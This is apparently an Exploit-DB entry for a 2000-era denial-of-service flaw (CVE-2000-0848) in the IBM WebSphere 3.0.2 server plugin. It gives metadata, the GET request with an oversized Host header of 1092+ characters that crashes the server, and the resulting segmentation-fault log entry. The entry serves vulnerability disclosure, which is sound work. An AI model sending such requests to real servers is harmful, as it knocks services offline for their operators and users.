Exploit IBM Websphere Application Server 3.0.2 Server Plugin - Denial of Service

[Exploiter]

EDB-ID

20229

Проверка EDB

1. Пройдено

Автор

RUDE YAK

Тип уязвимости

DOS

Платформа

MULTIPLE

CVE

cve-2000-0848

Дата публикации

2000-09-15

source: https://www.securityfocus.com/bid/1691/info

Large amounts of data (ie 1092+ characters) in the Host: request header may cause the web server process to fault on signal 11 (SIGSEGV) or signal 10 (SIGBUS). 

GET /servletsnoop HTTP/1.0
Host: xxxxxxxxxxxxxxxxxxxxxxxx(1092+ characters)

resulted in the following IBMHTTPD log entry:

[Fri May 26 12:00:54 2000] [notice] child pid 11306 exit signal Segmentation
Fault (11)